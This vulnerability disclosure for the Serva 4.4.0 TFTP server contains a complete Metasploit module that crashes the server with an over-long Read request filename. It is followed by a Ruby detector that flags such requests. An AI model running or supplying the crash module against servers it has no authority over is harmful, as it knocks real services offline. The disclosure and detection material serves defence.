Serva 4.4.0 TFTP Remote Buffer Overflow

The Serva TFTP server version 4.4.0 can be brought down by sending a special Read request.


MD5 | 75523ccfe4170ca41342bbd1293163fb

# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos
  Rank = ExcellentRanking

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
      'Description' => %q{
        The Serva TFTP server version 4.4.0 can be
        brought down by sending a special Read request.
      },
      'Author' => 'Yehia Elghaly',
      'License' => MSF_LICENSE,
      'DisclosureDate' => '2021-11-23'))

    register_options([Opt::RPORT(69)])
  end

  def run
    connect_udp
    print_status("Sending Read request...")
    # TFTP Read request layout: opcode | filename | NUL | mode | NUL
    sploit = "\x00\x01"   # opcode 1 = Read request (RRQ)
    sploit += "A" * 257   # filename field: 257 bytes
    sploit += "\x00"      # filename terminator
    sploit += "netascii"  # transfer mode
    sploit += "\x00"      # mode terminator
    udp_sock.put(sploit)
    disconnect_udp
  end
end
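
A defensive counterpart to the module above, as an added example that is not part of the original advisory or of Metasploit: a Ruby check that parses a TFTP request per RFC 1350 and flags an over-long filename field like the one in this Read request. MAX_FILENAME_LEN, the function names and the sample payloads are assumptions made for this example.

```ruby
# Added example (not from the original module): classify TFTP datagrams and
# flag read/write requests whose filename field is unusually long.
# MAX_FILENAME_LEN is an assumed policy limit, not a vendor-documented bound.
MAX_FILENAME_LEN = 128
TFTP_MODES = %w[netascii octet mail].freeze
OPCODES = { 1 => :rrq, 2 => :wrq }.freeze

# Constructed sample payloads (not captured traffic).
SAMPLES = {
  normal: "\x00\x01boot/pxelinux.0\x00octet\x00".b,
  long_name: ("\x00\x01" + 'A' * 257 + "\x00netascii\x00").b
}.freeze

# Parse a UDP payload as a TFTP RRQ/WRQ (RFC 1350):
#   2-byte opcode | filename | 0x00 | mode | 0x00 [| options (RFC 2347)]
# Returns nil for other opcodes, otherwise a hash describing the request.
def parse_tftp_request(payload)
  data = payload.b
  return nil if data.bytesize < 2
  op = OPCODES[data.unpack1('n')]
  return nil unless op
  fields = data.byteslice(2..).split("\x00".b, -1)
  # A well-formed request has filename and mode, each NUL-terminated,
  # so split with limit -1 yields at least three parts ending in "".
  well_formed = fields.size >= 3 && fields.last.empty?
  filename = fields[0] || ''
  mode = (fields[1] || '').downcase
  { op: op, filename_len: filename.bytesize, mode: mode, well_formed: well_formed }
end

# Return a list of findings for one datagram; empty means nothing to report.
def inspect_tftp(payload, max_len: MAX_FILENAME_LEN)
  req = parse_tftp_request(payload)
  return [] if req.nil?
  findings = []
  findings << :malformed_request unless req[:well_formed]
  findings << :oversized_filename if req[:filename_len] > max_len
  findings << :unknown_mode unless TFTP_MODES.include?(req[:mode])
  findings
end

SAMPLES.each { |name, pkt| puts "#{name}: #{inspect_tftp(pkt).inspect}" }
```

The same field-length test can be applied to payloads on UDP port 69 in a packet capture or an inline filter in front of a TFTP server that cannot be patched immediately.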
